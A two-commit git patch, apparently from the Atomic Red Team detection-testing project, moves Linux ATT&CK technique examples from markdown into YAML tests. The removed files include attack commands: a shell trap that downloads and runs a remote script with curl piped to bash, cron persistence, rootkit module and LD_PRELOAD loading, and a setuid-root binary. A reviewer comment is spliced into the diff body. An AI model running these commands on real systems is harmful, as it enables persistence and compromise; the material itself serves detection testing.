From 5f65f954beba32ac32577a6b89be1d1dc90c11d5 Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Fri, 25 May 2018 14:16:50 -0400
Subject: [PATCH 1/2] Done YAML'd all the linux
---
 Linux/Defense_Evasion/File_Deletion.md | 23 ------------
 Linux/Defense_Evasion/Rootkits.md | 21 -----------
 Linux/Lateral_Movement/Remote_File_Copy.md | 35 -------------------
 Linux/Persistence/Browser_Extensions.md | 24 -------------
 Linux/Persistence/Cron_Job.md | 6 ----
 .../Hidden_Files_and_Directories.md | 22 ------------
 Linux/Persistence/Trap.md | 10 ------
 Linux/Persistence/bash_profile_and_bashrc.md | 6 ----
 .../Privilege_Escalation/Setuid_and_Setgid.md | 15 --------
 atomics/T1156/T1156.yaml | 1 +
 atomics/T1158/T1158.yaml | 32 +++++++++++++++++
 11 files changed, 33 insertions(+), 162 deletions(-)
 delete mode 100644 Linux/Defense_Evasion/File_Deletion.md
 delete mode 100644 Linux/Defense_Evasion/Rootkits.md
 delete mode 100644 Linux/Lateral_Movement/Remote_File_Copy.md
 delete mode 100644 Linux/Persistence/Browser_Extensions.md
 delete mode 100644 Linux/Persistence/Cron_Job.md
 delete mode 100644 Linux/Persistence/Hidden_Files_and_Directories.md
 delete mode 100644 Linux/Persistence/Trap.md
 delete mode 100644 Linux/Persistence/bash_profile_and_bashrc.md
 delete mode 100644 Linux/Privilege_Escalation/Setuid_and_Setgid.md
diff --git a/Linux/Defense_Evasion/File_Deletion.md b/Linux/Defense_Evasion/File_Deletion.md
deleted file mode 100644
index c364bd5e..00000000
--- a/Linux/Defense_Evasion/File_Deletion.md
+++ /dev/null
@@ -1,23 +0,0 @@
-## File Deletion
-
-MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107)
-
-### Victim Configuration
-
- echo "This file will be shredded" > /tmp/victim-shred.txt
- mkdir /tmp/victim-files
- cd /tmp/victim-files
- touch a b c d e f g
-
-### Delete a single file
-
- rm -f /tmp/victim-files/a
-
-### Delete an entire folder
-
- rm -rf /tmp/victim-files
-
-### Overwrite and delete a file with shred
-
- shred -u /tmp/victim-shred.txt
-
diff --git a/Linux/Defense_Evasion/Rootkits.md b/Linux/Defense_Evasion/Rootkits.md
deleted file mode 100644
index 06becd24..00000000
--- a/Linux/Defense_Evasion/Rootkits.md
+++ /dev/null
@@ -1,21 +0,0 @@
-## Rootkits
-
-MITRE ATT&CK Technique: [T1014](https://attack.mitre.org/wiki/Technique/T1014)
-
-### Loadable Kernel Module based Rootkit
-
-Input:
-
- sudo insmod MODULE.ko
-
-OR
-
-Input:
-
- sudo modprobe MODULE.ko
-
-### LD_PRELOAD based Rootkit
-
-Input:
-
- export LD_PRELOAD=$PWD/libmy_r00tkit.so
\ No newline at end of file
diff --git a/Linux/Lateral_Movement/Remote_File_Copy.md b/Linux/Lateral_Movement/Remote_File_Copy.md
deleted file mode 100644
index 288f77db..00000000
--- a/Linux/Lateral_Movement/Remote_File_Copy.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# Remote File Copy
-
-MITRE ATT&CK Technique: [T1105](https://attack.mitre.org/wiki/Technique/T1105)
-
-## Adversary System Configuration
-### Ensure SSH access has been configured for an adversary account
- echo "This file transferred by scp" > /tmp/adversary-scp
- echo "This file transferred by sftp" > /tmp/adversary-sftp
- mkdir /tmp/adversary-rsync
- cd /tmp/adversary-rsync
- touch a b c d e f g
-
-## Victim System Configuration
-### Ensure SSH access has been configured for a victim account
-### Ensure write access for victim account to this directory
- mkdir /tmp/victim-files
- cd /tmp/victim-files
-
-## Push files to victim using rsync
- rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
-
-## Pull files from adversary using rsync
- rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
-
-## Push files to victim using scp
- scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
-
-## Pull file from adversary using scp
- scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
-
-## Push files to victim using sftp
- sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
-
-## Pull file from adversary using sftp
- sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md
deleted file mode 100644
index 3550fb8c..00000000
--- a/Linux/Persistence/Browser_Extensions.md
+++ /dev/null
@@ -1,24 +0,0 @@
-## Browser Extensions
-
-MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
-
-
-### Chrome (Developer Mode)
-
-Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
-
-Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
-
-Then click 'Select'
-
-### Chrome (Chrome Web Store)
-
-Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
-
-### Firefox
-
-Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
-
-Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
-
-Then click 'Open'
\ No newline at end of file
diff --git a/Linux/Persistence/Cron_Job.md b/Linux/Persistence/Cron_Job.md
deleted file mode 100644
index 09435f6a..00000000
--- a/Linux/Persistence/Cron_Job.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# Cron Job
-
-MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
-
-
- echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
diff --git a/Linux/Persistence/Hidden_Files_and_Directories.md b/Linux/Persistence/Hidden_Files_and_Directories.md
deleted file mode 100644
index 7a9100aa..00000000
--- a/Linux/Persistence/Hidden_Files_and_Directories.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Hidden Files and Directories
-
-MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
-
-To create visible directories and files
-
- mkdir visible-directory
- echo "this file is visible" > visible-directory/visible-file
-
- # List the contents the current directory and visible directory
- ls
- ls visible-directory
-
-
-To create hidden directories and files
-
- mkdir .hidden-directory
- echo "this file is hidden" > .hidden-directory/.hidden-file
-
- # List the contents the current directory and hidden directory
- ls -la
- ls -la .hidden-directory
\ No newline at end of file
diff --git a/Linux/Persistence/Trap.md b/Linux/Persistence/Trap.md
deleted file mode 100644
index cc3a46f4..00000000
--- a/Linux/Persistence/Trap.md
+++ /dev/null
@@ -1,10 +0,0 @@
-# Trap
-
-MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154)
-
-
- trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT
-
- exit
-
-After exiting the shell, the script will download and execute.
\ No newline at end of file
diff --git a/Linux/Persistence/bash_profile_and_bashrc.md b/Linux/Persistence/bash_profile_and_bashrc.md
deleted file mode 100644
index c09c8a1f..00000000
--- a/Linux/Persistence/bash_profile_and_bashrc.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# .bash_profile and .bashrc
-
-MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156)
-
- echo "/path/to/script.py" >> ~/.bash_profile
- echo "/path/to/script.py" >> ~/.bashrc
diff --git a/Linux/Privilege_Escalation/Setuid_and_Setgid.md b/Linux/Privilege_Escalation/Setuid_and_Setgid.md
deleted file mode 100644
index e785a5d2..00000000
--- a/Linux/Privilege_Escalation/Setuid_and_Setgid.md
+++ /dev/null
@@ -1,15 +0,0 @@
-# Setuid and Setgid
-
-MITRE ATT&CK Technique: [T1166](https://attack.mitre.org/wiki/Technique/T1166)
-
-Navigate to [hello.c](../Payloads/hello.c)
-
-Input:
-
- make hello
-
- sudo chown root hello
-
- sudo chmod u+s hello
-
- ./hello
\ No newline at end of file
diff --git a/atomics/T1156/T1156.yaml b/atomics/T1156/T1156.yaml
index a9fdaf14..48dd19fa 100644
--- a/atomics/T1156/T1156.yaml
+++ b/atomics/T1156/T1156.yaml
@@ -9,6 +9,7 @@ atomic_tests:
 supported_platforms:
 - macos
+ - linux
 input_arguments:
 script:
diff --git a/atomics/T1158/T1158.yaml b/atomics/T1158/T1158.yaml
index adf48593..95fdc5b3 100644
--- a/atomics/T1158/T1158.yaml
+++ b/atomics/T1158/T1158.yaml
@@ -84,3 +84,35 @@ atomic_tests:
 name: sh
 command: |
 defaults write com.apple.finder AppleShowAllFiles YES
+
+- name: Create visible Directories
+ description: |
+ xxx
+
+ supported_platforms:
+ - macos
+ - linux
+
+ executor:
+ name: sh
+ command: |
+ mkdir visible-directory
+ echo "this file is visible" > visible-directory/visible-file
+ ls
+ ls visible-directory
+
+- name: Create hidden directories and files
+ description: |
+ xxx
+
+ supported_platforms:
+ - macos
+ - linux
+
+ executor:
+ name: sh
+ command: |
+ mkdir .hidden-directory
+ echo "this file is hidden" > .hidden-directory/.hidden-file
+ ls -la
+ ls -la .hidden-directory
From 71023f23cfaefc56c63b9d4dabf0955fdc0bbd60 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Fri, 25 May 2018 18:17:01 +0000
Subject: [PATCH 2/2] Generate docs from job=validate_atomics_generate_docs branch=Linux-completion
---
 atomics/T1156/T1156.md | 2 +-
 atomics/T1158/T1158.md | 36 ++++++++++++++++++++++++++++++++++++
 atomics/index.md | 6 +++++-
 atomics/linux-index.md | 5 +++++
 atomics/macos-index.md | 6 +++++-
 5 files changed, 52 insertions(+), 3 deletions(-)
diff --git a/atomics/T1156/T1156.md b/atomics/T1156/T1156.md
index 5a5f8439..3dbda9a2 100644
--- a/atomics/T1156/T1156.md
+++ b/atomics/T1156/T1156.md
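Review bot: Both new T1158 tests are added with the placeholder `description: | xxx`, which is what the generated T1158.md will show a blue team trying to map a detection to the behaviour; replace it with a one-line statement of intent, e.g. for the second test `Creates a dot-prefixed directory and file (hidden from a plain ls) in the executor's working directory and lists them with ls -la.`. The `Create visible Directories` test only runs `mkdir`/`echo`/`ls` on non-hidden names and does not itself exercise hidden files, so its description should say it is the baseline to compare against the hidden-file test, or it should be folded into that test. Both commands write relative to whatever directory the executor happens to run in, and a bare `mkdir visible-directory` / `mkdir .hidden-directory` fails on a second run because the directory already exists; `mkdir -p` (or an explicit path such as `/tmp/.hidden-directory`) would make the tests repeatable, which matters since nothing in this hunk removes what they create.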
@@ -24,7 +24,7 @@ Permissions Required: User, Administrator
 ## Atomic Test #1 - .bash_profile and .bashrc
 xxx
-**Supported Platforms:** macOS
+**Supported Platforms:** macOS, Linux
 #### Inputs
diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md
index 988733be..8e8314bd 100644
--- a/atomics/T1158/T1158.md
+++ b/atomics/T1158/T1158.md
@@ -41,6 +41,10 @@ Permissions Required: User
 - [Atomic Test #6 - Show all hidden files](#atomic-test-6---show-all-hidden-files)
+- [Atomic Test #7 - Create visible Directories](#atomic-test-7---create-visible-directories)
+
+- [Atomic Test #8 - Create hidden directories and files](#atomic-test-8---create-hidden-directories-and-files)
+
@@ -127,3 +131,35 @@ xxx
 defaults write com.apple.finder AppleShowAllFiles YES
 ```
+
+
+## Atomic Test #7 - Create visible Directories
+xxx
+
+**Supported Platforms:** macOS, Linux
+
+
+#### Run it with `sh`!
+```
+mkdir visible-directory
+echo "this file is visible" > visible-directory/visible-file
+ls
+ls visible-directory
+```
+
+
+
+## Atomic Test #8 - Create hidden directories and files
+xxx
+
+**Supported Platforms:** macOS, Linux
+
+
+#### Run it with `sh`!
+```
+mkdir .hidden-directory
+echo "this file is hidden" > .hidden-directory/.hidden-file
+ls -la
+ls -la .hidden-directory
+```
+
+
diff --git a/atomics/index.md b/atomics/index.md
index 4af93d2a..0bf6845b 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -1,7 +1,7 @@
 # All Atomic Tests by ATT&CK Tactic & Technique
 # persistence
 - [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
- - Atomic Test #1: .bash_profile and .bashrc [macos]
+ - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
 - [T1015 Accessibility Features](./T1015/T1015.md)
 - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows]
 - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
@@ -37,6 +37,8 @@
 - Atomic Test #4: Hidden files [macos]
 - Atomic Test #5: Hide a Directory [macos]
 - Atomic Test #6: Show all hidden files [macos]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1179 Hooking](./T1179/T1179.md)
 - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
 - [T1062 Hypervisor](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
@@ -167,6 +169,8 @@
 - Atomic Test #4: Hidden files [macos]
 - Atomic Test #5: Hide a Directory [macos]
 - Atomic Test #6: Show all hidden files [macos]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1147 Hidden Users](./T1147/T1147.md)
 - Atomic Test #1: Hidden Users [macos]
 - [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
diff --git a/atomics/linux-index.md b/atomics/linux-index.md
index 1eeb45d1..4f199149 100644
--- a/atomics/linux-index.md
+++ b/atomics/linux-index.md
@@ -1,6 +1,7 @@
 # Linux Atomic Tests by ATT&CK Tactic & Technique
 # persistence
 - [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
+ - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
 - [T1067 Bootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1176 Browser Extensions](./T1176/T1176.md)
 - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
@@ -11,6 +12,8 @@
 - [T1158 Hidden Files and Directories](./T1158/T1158.md)
 - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
 - Atomic Test #3: Hidden file [macos, linux]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1168 Local Job Scheduling](./T1168/T1168.md)
 - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
@@ -128,6 +131,8 @@
 - [T1158 Hidden Files and Directories](./T1158/T1158.md)
 - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
 - Atomic Test #3: Hidden file [macos, linux]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1070 Indicator Removal on Host](./T1070/T1070.md)
 - Atomic Test #3: rm -rf [macos, linux]
diff --git a/atomics/macos-index.md b/atomics/macos-index.md
index 5c0868e6..226b96b4 100644
--- a/atomics/macos-index.md
+++ b/atomics/macos-index.md
@@ -1,7 +1,7 @@
 # macOS Atomic Tests by ATT&CK Tactic & Technique
 # persistence
 - [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
- - Atomic Test #1: .bash_profile and .bashrc [macos]
+ - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
 - [T1176 Browser Extensions](./T1176/T1176.md)
 - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
 - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
@@ -16,6 +16,8 @@
 - Atomic Test #4: Hidden files [macos]
 - Atomic Test #5: Hide a Directory [macos]
 - Atomic Test #6: Show all hidden files [macos]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1161 LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1159 Launch Agent](./T1159/T1159.md)
@@ -190,6 +192,8 @@
 - Atomic Test #4: Hidden files [macos]
 - Atomic Test #5: Hide a Directory [macos]
 - Atomic Test #6: Show all hidden files [macos]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1147 Hidden Users](./T1147/T1147.md)
 - Atomic Test #1: Hidden Users [macos]
 - [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)